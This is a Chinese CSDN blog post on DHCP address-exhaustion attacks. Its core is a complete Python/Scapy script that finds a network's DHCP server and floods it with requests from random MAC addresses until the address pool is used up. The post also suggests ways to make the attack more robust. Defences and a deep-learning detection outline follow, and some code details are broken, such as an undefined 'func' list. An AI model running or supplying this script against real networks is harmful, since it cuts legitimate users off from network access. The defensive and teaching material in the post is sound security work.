DHCP地址耗尽攻击及防御

最新推荐文章于 2025-02-19 21:30:00 发布
最新推荐文章于 2025-02-19 21:30:00 发布
阅读量1.2k 收藏 23
点赞数 24
文章标签: 网络 网络安全 dhcp地址耗尽攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43178927/article/details/136619857
版权
本文介绍了一个使用Python和Scapy库编写的DHCP攻击脚本,通过获取DHCP服务器信息,实施地址抢占攻击。脚本包含获取DHCP服务器IP、监听匹配响应和执行DHCP攻击的多线程过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

使用Python编写DHCP攻击脚本,通过Scapy库模拟发送和接收DHCP数据包。它首先获取网络中的DHCP服务器地址和子网掩码信息,然后实施DHCP地址抢占攻击,尝试分配并占用大量IP地址,从而导致合法客户端无法正常获取IP地址。

步骤

  1. 获取DHCP服务器IP:getdhcpip函数负责构造并发送一个DHCP发现请求包至全网广播地址(255.255.255.255),以获取DHCP服务器的响应。

  2. 监听并匹配DHCP响应:matchpacket函数监听网络流量,并过滤出目标为255.255.255.55的UDP数据包,从中提取出DHCP服务器的IP地址及当前子网掩码信息。

  3. 实施DHCP攻击:当获取到DHCP服务器IP与子网掩码后,dhcp_attack函数根据子网掩码计算可抢占的IP范围,然后针对每个可能的IP地址构造DHCP请求包,模拟多个客户端请求IP地址,从而发起DHCP地址抢占攻击。

  4. 多线程执行:main函数创建并启动多个线程,分别运行上述三个函数,确保同时进行DHCP服务器IP获取、响应匹配以及地址抢占攻击。

代码实现

#!/usr/bin/env python

from scapy.all import *
from time import ctime, sleep
from threading import Thread, Lock
import IPy

# 全局变量
flag = 0
dhcp_address = '0.0.0.0'
current_subnet = '0.0.0.0'


def getdhcpip():
    """
    获取DHCP服务器的IP地址。
    全局变量:flag, 用于控制循环的继续或停止
    """
    global flag
    print("[+] Geting The DHCP server IP Address!")
    while flag == 0:
        # 使用指定的网卡和随机的MAC地址发送DHCP发现请求
        tap_interface = 'eth0'
        src_mac_address = RandMAC()
        ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_address, type=0x800)
        ip = IP(src='0.0.0.0', dst='255.255.255.255')
        udp = UDP(sport=68, dport=67)
        fam, hw = get_if_raw_hwaddr(tap_interface)
        bootp = BOOTP(chaddr=hw, ciaddr='0.0.0.0', xid=0x01020304, flags=1)
        dhcp = DHCP(options=[("message-type", "discover"), "end"])
        packet = ethernet / ip / udp / bootp / dhcp
        sendp(packet, count=1, verbose=0)
        sleep(0.1)


def matchpacket():
    """
    监听网络,匹配DHCP服务器的响应。
    全局变量:flag, dhcp_address, current_subnet
    """
    global flag
    global dhcp_address
    global current_subnet
    while flag == 0:
        try:
            # 捕获UDP包,过滤条件为UDP且目标地址为255.255.255.255
            a = sniff(filter='udp and dst 255.255.255.255', iface='eth0', count=2)
            current_subnet = a[1][1][3].options[1][1]
            dhcp_address = a[1][1][0].src
            # 如果获取到的DHCP服务器地址和子网掩码不为'0.0.0.0',则停止循环
            if dhcp_address is not '0.0.0.0' and current_subnet is not '0.0.0.0':
                flag = 1
                print("[+] The DHCP SERVER IP ADDRESS IS " + dhcp_address + "\r\n")
                print("[+] CURRENT NETMASK IS " + current_subnet + "\r\n")
        except:
            pass  # 忽略捕获到的异常
        time.sleep(0.1)


def dhcp_attack():
    """
    实施DHCP攻击,抢占网络地址。
    全局变量:dhcp_address, current_subnet
    """
    global dhcp_address
    address_info = IPy.IP(dhcp_address).make_net(current_subnet).strNormal()
    address = address_info.split('/')[0]
    address = address.replace('.0', '')
    netmask = address_info.split('/')[1]
    max_sub_number = 2 ** (32 - int(netmask)) - 2
    bin_ip = address_info.split('/')[0].split('.')

    ip_info = ''
    for i in range(0, 4):
        string = str(bin(int(bin_ip[i]))).replace('0b', '')
        if (len(string) != 8):
            for i in range(0, 8 - len(string)):
                string = "0" + string
        ip_info = ip_info + str(string)

    for i in range(1, max_sub_number + 1):
        ip = str(bin(int(ip_info, 2) + i))[2:]
        need_address = str(int(ip[0:8], 2)) + '.' + str(int(ip[8:16], 2)) + '.' + str(int(ip[16:24], 2)) + '.' + str(
            int(ip[24:32], 2))
        rand_mac_address = RandMAC()
        dhcp_attack_packet = Ether(src=rand_mac_address, dst='ff:ff:ff:ff:ff:ff') / IP(src='0.0.0.0',
                                                                                       dst='255.255.255.255') / UDP(
            sport=68, dport=67) / BOOTP(chaddr=rand_mac_address) / DHCP(
            options=[("message-type", 'request'), ("server_id", dhcp_address), ("requested_addr", need_address), "end"])
        sendp(dhcp_attack_packet, verbose=0)
        print("[+] USE IP: " + need_address + " Attacking " + dhcp_address + " Now!")


def main():
    """
    创建线程并启动DHCP攻击。
    """
    threads = []
    for i in range(0, len(func)):
        t1 = Thread(target=func[i])
        threads.append(t1)
    for t in threads:
        t.setDaemon(True)
        t.start()
    for t in threads:
        t.join()
    dhcp_attack()


if __name__ == '__main__':
    main()
    print("[+] Attack Over!")

优化建议

  1. 错误处理与重试机制:增强代码健壮性,当获取DHCP服务器地址失败时,能重新尝试或停止攻击。

  2. 合理并发控制:调整并发策略,防止因频繁发送数据包引发网络拥塞。

  3. 有效性检查:对接收和使用的IP地址进行合理性验证,确保攻击范围不超出实际网络环境。

防御措施

  1. 路由器启用DHCP Snooping:限制非法DHCP请求,仅允许特定端口发出DHCP请求。
  2. 速率限制:对DHCP服务器接收请求的速度加以限制,避免短时间内遭受大量请求冲击。
  3. MAC地址绑定:配置DHCP服务器进行MAC地址与IP地址静态绑定,仅响应已知设备请求。
  4. 部署入侵检测系统:使用IDS监控异常DHCP流量,并及时采取行动阻断恶意行为。

使用深度学习检测攻击

使用深度学习检测DHCP耗尽攻击(DHCP Exhaustion Attack)通常涉及多个步骤,包括数据收集、特征工程、模型训练和实时监测。下面提一种实现方法:

  1. 数据收集:
  • 从网络流量中抓取DHCP相关的数据包,例如:discover请求、offer响应、request请求、acknowledge响应等。
  • 记录每个DHCP交互的时间戳、客户端MAC地址、分配的IP地址、交互频率等信息。
  1. 特征工程:
  • 构建特征向量,如:单个客户端在一定时间内请求IP的数量、同一MAC地址请求速率的变化、DHCP池内剩余IP数量随时间变化情况、新出现MAC地址的频率等。
  • 可能还包括利用聚类分析或统计异常值检测来识别不正常的DHCP活动模式。
  1. 构建深度学习模型:
  • 使用深度学习模型(如RNN、LSTM、Autoencoder或其他时序模型)来处理时序数据,捕捉潜在的攻击模式。
  • 或者结合卷积神经网络(CNN)来处理有结构的数据(如果DHCP报文可以转化为图像形式表示)。
  1. 模型训练:
  • 利用正常DHCP通信记录和已知的攻击案例进行训练,让模型学会区分正常行为与恶意耗尽攻击。
  • 对于无监督学习模型,可以训练其识别数据中的异常模式;对于有监督学习,则需要标记数据集以指示正常和攻击样本。
  1. 实时监测与预警:
  • 将模型部署到实际环境中,实时监控DHCP服务器的行为和网络上的DHCP通信。
  • 当模型预测到发生DHCP耗尽攻击的概率超过设定阈值时,触发警报并采取相应的防御措施。
  1. 评估与优化:
  • 持续收集真实环境下的反馈数据,不断调整和优化模型参数,提高检测准确率和时效性。
02 - DHCP地址耗尽攻击
weixin_43586169的博客
03-28 1891
描述DHCP攻击的原理以及还原了攻击手法
DHCP饥饿攻击解释及实验(MAC泛洪攻击DHCP DoS攻击
墨痕诉清风的博客
07-11 1538
在弹出的窗口中填写攻击参数,服务器地址为Kali的IP地址,Start IP和End IP写为非VMnet1中的IP地址,其他参数随意写,此时我们便对windows 10主机分配了一个虚假的ip, 使得其无法正常联网。攻击原理:攻击者通过伪造MAC地址持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址,使得正常主机不能访问网络。:转发代理(网关)IP 地址DHCP 客户端发出请求报文后经过的第一个 DHCP 中继的 IP 地址
常见的DHCP攻击防范
栉风沐雪的博客
06-06 2236
DHCP用来自动分配ip地址,每一个DHCP service(DHCP服务器)都有一个DHCP pool(分配池),每一个终端对DHCP service发送请求时,DHCP service会从池中给终端分配IP,分配的方式会因为OS不同而不同,从前往后,从后往前,或者随机分配。DHCP饿死攻击是利用修改discover报文中的CHADDR地址,不断的向DHCP service发送请求,以此来耗尽DHCP pool中的地址。当其他终端在此想使用DHCP服务时,收到的ip为空。
DHCP 地址耗尽攻击防御
认真走好每一小步
07-21 1295
认真走好每一小步 请多指教。
DHCP攻击防护
最新发布
scy1034446395的博客
02-19 901
DHCP攻击类型与其对应的防护措施
【内网攻击DHCP协议概念——地址耗尽攻击
shelter1234567的博客
10-14 1694
本次我会介绍dhcp的基本概念,且从抓包的形式上从流量上来理解dhcp服务端和客户端的通信细节。为了显示dhcp服务攻击,我将采用win2008来部署dhcp服务器,最后用通信流量分析攻击的细节。
DHCP地址耗尽攻击
辉小鱼的博客
11-17 1580
​ 在DHCP地址租期超时之前,已经分配出去的IP地址不会重复分配给其他新接入的终端。返回终端无法分配IP地址,造成新接入的自动IP设置的终端无法接入网络。​ 路由器内置的DHCP服务器,划定了一个地址池作为自动分配给接入终端号IP地址的范围。攻击工具伪装成大量的接入主机,向路由器内的DHCP服务器请求大量的IP地址分配。作为固定分配给某个终端使用的,不受此种攻击的影响。使用yersinia执行耗尽攻击DHCP地址耗尽攻击DHCP地址耗尽攻击
DHCP 耗竭攻击 --网络大典
Javvin的专栏
07-25 3468
        DHCP 耗竭的攻击通过利用伪造的 MAC 地址来广播 DHCP 请求的方式来进行。利用诸如 gobbler 之类的攻击工具就可以很容易地造成这种情况。如果所发出的请求足够多的话,网络攻击者就可以在一段时间内耗竭向 DHCP 服务器所提供的地址空间。结果当合法用户请求一个 DHCP IP 地址的时候也会被拒绝,并因此而不能访问网络DHCP 耗竭可以为纯粹的服务拒绝(DoS)机制,
第三章 DHCP攻击防御
OneZeRoXd的博客
11-04 914
DHCP的基本配置 DHCP可以分配IP地址、网关以及DNS服务器。 DHCP服务器与客户端之间要设置租约,租约一到分配出去的地址收回,不过可以续约。 DHCP服务器要设置地址池,用来指定要分配的地址范围,地址池中的部分不向外分配 在交换机上配置DHCP 启用DHCP功能: DCRS(config)#server DHCP 创建名为test的地址池,并进入地址池的局部配置模式: DCRS(conf...
DHCP Snooping的攻击防范功能
2301_76769137的博客
05-28 924
DHCP服务器IP地址配置为10.2.1.2/24,同时配置一个IP地址范围为192.168.1.0/24的地址池,地址池中网关配置为192.168.1.1。以GE0/0/1接口为例,GE0/0/2的配置与GE0/0/1接口相同,不再赘述。以GE0/0/1接口为例,GE0/0/2的配置与GE0/0/1接口相同,不再赘述。以GE0/0/1接口为例,GE0/0/2的配置与GE0/0/1接口相同,不再赘述。以GE0/0/1接口为例,GE0/0/2的配置与GE0/0/1接口相同,不再赘述。
DHCP原理及DHCP服务器的防攻击手段
热门推荐
feipeng45的博客
10-16 1万+
一、DHCP简介 1、产生背景:网络增大,手工配置存在很多问题【人员素质要求高、容易出错、灵活性差、IP地址资源利用率低、工作量大,不利于管理等】 2、DHCP相对于静态手工配置的优点【效率高、灵活性强、易于管理等】 二、DHCP的原理与配置 (一)、DHCP的基本工作过程【发现阶段、提供阶段、请求阶段、确认阶段】如下图: 【发现阶段】:在发现阶段,DHCP客户端会以广播的方式给自己所在在广播域...
dhcp地址攻击
12-30
使用bt5的yersinia攻击windows server 2003搭建的dhcp服务器
安全HCIP之DHCP耗尽攻击
XiaoHG_CSDN的博客
10-04 1185
DHCP耗尽攻击 伪造大量的非法的MAC请求网关分配IP,使地址池资源耗尽,正常用户分配不到地址
DHCP攻击防御
qq_43518594的博客
10-15 1万+
DHCP攻击 原理: DHCP攻击针对的目标是网络中的DHCP服务器,原理是耗尽DHCP服务器所有的IP地址资源,使其无法正常提供地址分配服务。然后在网络中再架设假冒的DHCP服务器为客户端分发IP地址,从而来实现中间人攻击DHCP工作过程: 工作过程分为四个阶段 发现阶段:首先客户端广播发送DHCP Discover报文来寻找DHCP服务器。 提供阶段:DHCP服务器接收到DHCP Discover报文后,查看自己的地址池中是否有可用地址,如果有,会在这个IP上做一个标记,并用DHCP Offer报
部署DHCP服务器与地址耗尽攻击
m0_48454948的博客
12-19 593
部署DHCP服务器与地址耗尽攻击
解决DHCP IP地址耗尽问题
normanhere的博客
05-10 1524
IP地址分配会从上往下分配,一个地址池分配完了 就从另一个地址池开始分配。类似的做法也存在于H3C 但是H3C的配置更加简单 代码举例。锐捷解决DHCP IP地址耗尽问题。
DHCP攻击
weixin_45823267的博客
11-04 722
DHCP攻击(同样没啥实用性) 攻击目标:网络中谁提供DCHC服务就攻击谁,使其无法正常工作,然后黑客再提供个DHCP服务器,使数据从上面走,从而截取数据。 DHCP基本配置 (1)DHCP不仅可以分配IP地址,还可以配置默认网关,和DNS服务器。 (2)DHCP服务器与客户端之间要设置租约,在期间要续约,不然时间到了要收回IP (3)DHCP可以设置地址池来规定分配IP地址的范围。 (4)DHC...
电信网络DHCP攻击防御策略分析
3. DHCP耗竭攻击攻击者通过大量伪造MAC地址请求DHCP地址耗尽服务器的地址池,导致合法用户无法获取IP地址。防范手段通常包括限制交换机端口的MAC地址学习数量,以防止CAM表泛滥,或者采用DHCP服务器的地址租期...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

键盘侠伍十七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值